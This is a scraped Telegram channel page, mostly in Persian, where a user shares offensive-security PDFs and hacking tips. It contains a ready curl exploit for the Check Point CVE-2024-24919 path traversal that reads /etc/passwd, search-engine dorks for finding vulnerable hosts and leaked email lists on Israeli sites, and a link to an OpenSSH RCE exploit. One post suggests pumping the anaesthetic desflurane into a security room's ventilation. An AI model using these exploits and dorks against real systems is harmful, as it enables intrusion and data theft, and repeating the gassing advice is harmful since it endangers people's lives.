CyberSecurity – Telegram
CyberSecurity
@matitanium
904 subscribers
121 photos
26 videos
73 files
144 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
About
Blog
Apps
Platform
Join
CyberSecurity
904 subscribers
CyberSecurity
Windows Privilege Escalation Secrets.pdf
346.6 KB
362 views
CyberSecurity
Linux Privilege Escalation Guide .pdf
131.5 KB
369 views
CyberSecurity
Red Team Interview Questions.pdf.pdf
6.7 MB
394 views
CyberSecurity
Attacking Active Directory (AD) from Kali Linux.pdf
3.7 MB
377 views
CyberSecurity
AD sets DC01DC02MS01WK01.pdf
694.4 KB
390 views
CyberSecurity
Lateral Movement.pdf
7.2 MB
433 views
CyberSecurity
Windows Privilege Escalation.pdf
308.6 KB
422 views
CyberSecurity
Active Directory Overview .pdf
1.2 MB
Active Directory Overview .pdf
453 views
CyberSecurity
Enumerate Active Directory PowerView 3.0.pdf
104.3 KB
473 views
CyberSecurity
beginners guide to AD.pdf
1.8 MB
454 views
CyberSecurity
Linux Privilege Escalation.pdf
1.3 MB
534 views
CyberSecurity
Powershell Tutorial for Beginners.pdf
1.8 MB
513 views
CyberSecurity
Active Directory Attacks.pdf
529.3 KB
527 views
CyberSecurity
Beginner's Guide to Active Directory.pdf
1.8 MB
4👍1
494 views
CyberSecurity
چنتا کتاب دیگه هم که تو بحث Post Exploit و Red team شاید دنبالشون باشین

خودم برسی نکردم همرو
@matitanium
5👍1
455 viewsedited  
CyberSecurity
حمله فیزیکی به یک سازمان که حراستش خیلی گیره؟

2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!
😈10👍1
438 viewsMatin Nouriyan, edited  
CyberSecurity
CVE-2024–24919

. Dorks

Hunter: /product.name="Check Point SSL Network Extender"

FOFA: noscript="Check Point SSL Network Extender"

SHODAN: http.noscript="Check Point SSL Network Extender"

@matitanium
453 viewsMatin Nouriyan, edited  
CyberSecurity
CyberSecurity
CVE-2024–24919 . Dorks Hunter: /product.name="Check Point SSL Network Extender" FOFA: noscript="Check Point SSL Network Extender" SHODAN: http.noscript="Check Point SSL Network Extender" @matitanium
Exploit

curl -k -X POST "https://{ip}/clients/MyCRL" \  -H "Host: {ip}/" \  -H "User-Agent: Mozilla/5.0 (Macintosh:@Matitanium; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" \  -H "Te: trailers" \  -H "Dnt: 1" \  -H "Connection: keep-alive" \  -H "Content-Length: 48" \  --data "aCSHELL/../../../../../../../../../../../etc/passwd"
525 viewsMatin Nouriyan, edited  
CyberSecurity
Google dork for email leak 📝

intext:@"yahoo|gmail|hotmail".com filetype:txt site:*.il

@matitanium
489 viewsMatin Nouriyan, edited  
CyberSecurity
استفاده از NMAP برای برسی ساختار AD و Domain


دامین کنترل رو پورت اسکن کنید و پروتکل LDAP رو پیدا کنید
معمولا پورت 389


کامند استفاده شده:


nmap -p389 -sV -n — noscript ldap-rootdse <DC-IP>

@matitanium
👌4👎1
545 viewsMatin Nouriyan, edited  
CyberSecurity
CVE-2024-6387
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

#version
SSH-2.0-OpenSSH_8.9p1
Ubuntu-3ubuntu0.10

فقط روی SSH سرور ها با معماری 32 بیت قابل اجرا هستش


#Exploit

https://github.com/asterictnl-lvdw/CVE-2024-6387

@matitanium
GitHub
GitHub - Karmakstylez/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) - Karmakstylez/CVE-2024-6387
👍3
797 viewsMatin Nouriyan, edited